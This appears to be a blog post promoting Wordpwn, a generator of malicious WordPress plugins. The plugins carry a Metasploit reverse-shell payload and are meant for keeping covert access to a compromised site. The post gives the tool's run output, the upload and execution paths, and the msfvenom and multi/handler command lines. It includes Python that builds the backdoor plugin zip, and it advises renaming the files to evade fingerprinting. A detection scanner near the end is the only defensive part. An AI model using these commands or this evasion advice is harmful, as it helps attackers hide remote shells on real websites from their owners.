I have covered multiple tools that deal with WordPress vulnerability assessment and exploitation. A good example of a WordPress exploitation framework is WPXF, and the WordPress attack-suite category is well represented by WPForce and Yertle. This post is about Wordpwn, which helps you keep a foothold after you have got in with one of those tools, without the administrator noticing.
What is Wordpwn?
As the name suggests, Wordpwn is an open source malicious WordPress plugin generator written in Python that uses the Metasploit framework to build its payloads. The script itself is fairly simple and has been tested on Kali Linux. It automates the whole procedure: it generates a php/meterpreter/reverse_tcp payload with msfvenom, wraps it in a WordPress plugin and zips it, so that once the plugin is uploaded to the target you get a reverse shell; it then starts the local listener with msfconsole using exploit/multi/handler. Here is a sample run (the arguments are LHOST, LPORT and a yes/no flag for launching the handler):
python wordpwn.py 127.0.0.1 8819 Y
[*] Checking if msfvenom installed
[+] msfvenom installed
[+] Generating plugin script
[+] Writing plugin script to file
[+] Generating payload To file
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1303 (iteration=0)
php/base64 chosen with final size 1303
Payload size: 1303 bytes
[+] Writing files to zip
[+] Cleaning up files
[+] General Execution Location: http://(target)/wp-content/plugins/malicous/
[+] General Upload Location: http://(target)/wp-admin/plugin-install.php?tab=upload
[+] Launching handler
[ ok ] Starting postgresql (via systemctl): postgresql.service.
All you need to do now is upload the malicious.zip created in the project directory through the plugin upload page shown above. Keep in mind that this page only accepts uploads from an account allowed to install plugins, so on a normal single-site install you need administrator-level access. I would, however, change a few things in the .zip before using it, because the file names are always the same: QwertyRocks.php is the plugin file and wetw0rk_maybe.php holds the base64-encoded payload. Fixed names like these, together with the fixed plugin directory name, are trivial for a defender to fingerprint, as is an unencoded eval(base64_decode(...)) wrapper with a reverse-connect call inside it.
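To make the plugin layout and its footprint concrete, here is an added example; it is not Wordpwn's own code and is not a copy of what the tool writes. It rebuilds the structure described above (a loader file carrying the WordPress plugin header that includes a separate payload file, zipped under the plugin directory) around a constructed stand-in payload, records the two Metasploit command lines the tool automates, and then scans a plugin .zip for the indicators that layout leaves behind. The directory and file names are taken from this post; the base64 and socket-call patterns are assumptions about the stager's shape, not a signature taken from Metasploit.

```python
# Added example for this post, not Wordpwn's own code. Builds a plugin .zip in
# the layout described above around a constructed stand-in payload, and scans
# a plugin .zip for the indicators that layout leaves behind.
import base64
import io
import re
import zipfile

# Names the post reports Wordpwn using; treated as assumptions here.
PLUGIN_DIR = "malicious"
LOADER_FILE = "QwertyRocks.php"
PAYLOAD_FILE = "wetw0rk_maybe.php"

# Minimal header WordPress needs to list a directory as a plugin (constructed).
PLUGIN_HEADER = """<?php
/*
Plugin Name: {name}
Description: Added example plugin header (constructed)
Version: 1.0
*/
"""


def build_plugin_zip(payload_php, plugin_dir=PLUGIN_DIR, loader=LOADER_FILE,
                     payload_name=PAYLOAD_FILE):
    """Return the bytes of a plugin .zip in the layout described above.

    WordPress reads the plugin header from the loader file; the loader just
    includes the payload file, so the payload runs whenever the activated plugin
    is loaded, and also on a direct GET to wp-content/plugins/<dir>/<file>.
    """
    loader_src = PLUGIN_HEADER.format(name=plugin_dir)
    loader_src += "include_once __DIR__ . '/%s';\n" % payload_name
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("%s/%s" % (plugin_dir, loader), loader_src)
        zf.writestr("%s/%s" % (plugin_dir, payload_name), payload_php)
    return buf.getvalue()


def sample_payload(lhost="127.0.0.1", lport=8819):
    """Constructed stand-in for the msfvenom output, NOT a real stager.

    It only mimics the shape the post describes: a php/base64-encoded blob
    wrapped in eval(base64_decode(...)) with a reverse-connect call inside.
    """
    inner = "$s = fsockopen('%s', %d); /* stand-in, does nothing useful */" % (lhost, lport)
    blob = base64.b64encode(inner.encode()).decode()
    return ("<?php error_reporting(0); eval(base64_decode('%s')); ?>" % blob).encode()


def msf_commands(lhost, lport, out="payload.php"):
    """The two Metasploit steps the post says Wordpwn automates, as shell lines."""
    return {
        "msfvenom": ("msfvenom -p php/meterpreter/reverse_tcp LHOST=%s LPORT=%d "
                     "-e php/base64 -f raw -o %s" % (lhost, lport, out)),
        "handler": ("msfconsole -q -x 'use exploit/multi/handler; "
                    "set payload php/meterpreter/reverse_tcp; "
                    "set LHOST %s; set LPORT %d; run'" % (lhost, lport)),
    }


# Detection side: heuristics to run over an uploaded plugin .zip or over
# wp-content/plugins/. Patterns are assumptions about the stager's shape.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)")
NET_CALLS = re.compile(r"\b(fsockopen|stream_socket_client|socket_create|curl_init)\s*\(")


def scan_php(path, src):
    """Flag indicators in one PHP file, peeling one base64 layer if present."""
    findings = []
    if path.rsplit("/", 1)[-1] in (LOADER_FILE, PAYLOAD_FILE):
        findings.append((path, "known Wordpwn filename"))
    m = EVAL_B64.search(src)
    if m:
        findings.append((path, "eval(base64_decode(...))"))
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            decoded = ""
        src = src + "\n" + decoded  # scan the decoded layer as well
    for call in sorted(set(NET_CALLS.findall(src))):
        findings.append((path, "outbound socket call: " + call))
    return findings


def scan_plugin_zip(zip_bytes):
    """Return [(path, reason), ...] for every indicator found in the zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.endswith(".php"):
                continue
            src = zf.read(info).decode("utf-8", "replace")
            findings.extend(scan_php(info.filename, src))
    return findings


if __name__ == "__main__":
    for path, reason in scan_plugin_zip(build_plugin_zip(sample_payload())):
        print(path, "->", reason)
```

Running the script scans the zip it just built and reports the known file names, the eval(base64_decode(...)) wrapper and the fsockopen call found under it; a plugin built with different names and a plain payload file produces no findings, which is exactly why renaming the files is the first thing to change before using the tool, and why a defender should not rely on the file-name check alone.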
Other than the Metasploit framework, the script needs no elaborate installation. Check out the project hosted on GitHub and clone it to a location of your liking.